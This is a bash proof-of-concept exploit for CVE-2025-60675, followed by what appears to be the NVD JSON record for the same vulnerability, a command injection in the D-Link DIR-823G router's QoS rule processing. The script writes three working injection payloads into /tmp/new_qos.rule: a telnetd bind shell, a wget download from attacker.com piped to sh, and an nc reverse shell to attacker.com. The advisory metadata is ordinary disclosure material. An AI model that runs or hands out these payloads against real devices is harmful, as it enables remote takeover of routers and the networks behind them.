CVE-2025-60675

#!/bin/bash # CVE-2025-60675 PoC - D-Link DIR-823G Command Injection # Target: D-Link DIR-823G Router # Firmware: DIR823G_V1.0.2B05_20181207.bin # Vulnerability: Command injection in /tmp/new_qos.rule processing # This PoC demonstrates how to inject commands via malicious QoS rule file # The injected commands will be executed by the vulnerable timelycheck/sysconf binaries TARGET_IP="192.168.0.1" MALICIOUS_QOS_FILE="/tmp/new_qos.rule" # Create malicious QoS configuration file with command injection payload # The semicolon (;) allows command chaining in shell cat > "$MALICIOUS_QOS_FILE" << 'EOF' device_mac=00:11:22:33:44:55;telnetd -p 8888 -l /bin/sh bandwidth_up=1000 bandwidth_down=2000 priority=high EOF # Alternative injection using command substitution cat > "$MALICIOUS_QOS_FILE" << 'EOF' device_mac=00:11:22:33:44:55;$(wget http://attacker.com/shell.sh -O -|sh) bandwidth_up=1000 bandwidth_down=2000 EOF # Alternative: Reverse shell payload cat > "$MALICIOUS_QOS_FILE" << 'EOF' device_mac=00:11:22:33:44:55;nc -e /bin/sh attacker.com 4444 bandwidth_up=1000 bandwidth_down=2000 EOF echo "[*] Malicious QoS rule file created: $MALICIOUS_QOS_FILE" echo "[*] The file contains command injection payload" echo "[*] When timelycheck or sysconf processes this file, injected commands will execute"

{"cve": {"id": "CVE-2025-60675", "sourceIdentifier": "[email protected]", "published": "2025-11-13T19:15:48.420", "lastModified": "2025-11-17T19:04:49.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the D-Link DIR-823G router firmware DIR823G_V1.0.2B05_20181207.bin in the timelycheck and sysconf binaries, which process the /tmp/new_qos.rule configuration file. The vulnerability occurs because parsed fields from the configuration file are concatenated into command strings and executed via system() without any sanitization. An attacker with write access to /tmp/new_qos.rule can execute arbitrary commands on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-823g_firmware:1.0.2b05_20181207:*:*:*:*:*:*:*", "matchCriteriaId": "45B79D73-7818-44BE-8703-70E0691A183D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-823g:-:*:*:*:*:*:*:*", "matchCriteriaId": "67B980AA-84BE-4D22-B4E7-7B2DBF571B65"}]}]}], "references": [{"url": "http://d-link.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-823G/CVE-2025-60675.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}